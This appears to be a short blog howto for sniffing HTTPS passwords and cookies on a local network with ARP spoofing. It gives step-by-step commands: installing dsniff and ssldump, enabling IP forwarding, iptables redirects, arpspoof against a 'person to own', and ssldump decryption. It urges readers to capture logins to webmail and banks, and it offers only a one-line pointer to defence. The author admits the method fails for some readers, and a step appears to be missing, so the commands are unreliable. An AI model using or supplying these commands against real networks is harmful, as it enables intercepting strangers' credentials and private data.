Howto: Use arpspoof, webmitm, and ssldump to effectively sniff passwords and other info via https connections on the lan/wlan with Ubuntu Linux!
Let me show you how easy it is to sniff someone elses password/cookies via ssl/https on the lan/wlan with ubuntu linux.
We will be using Arp Spoofing/Poisoning for this attack, if you have problems with this howto, there is an alternate with ettercap here that may be a bit easier
You can learn more about arp spoofing and poisoning here
The Attack preparation:
First lets grab the necessary packages:
sudo apt-get install dsniff ssldump
Now lets enable packet forwarding:
echo 1 > /proc/sys/net/ipv4/ip_forward
Lets set some iptables rules:
iptables -t nat -A PREROUTING -p tcp --dport 443 -j REDIRECT
iptables -A FORWARD -j ACCEPT
arpspoof -t "target ip(person to own)" "gateway ip(router)"
ssldump -n -d -k webmitm.crt | tee ssldump.log
Now all you do is wait for the target machine to log into google/gmail/yahoo/msn/hotmail or any other https connection, even a bank or whatever interests you and you will see the passwords pop up in the terminal.
Defense against this attack:
Please see my page on hardening the Ubuntu Linux kernel with sysctl here
It seems like this isnt working for everyone, I will be redoing this howto today, stay tuned.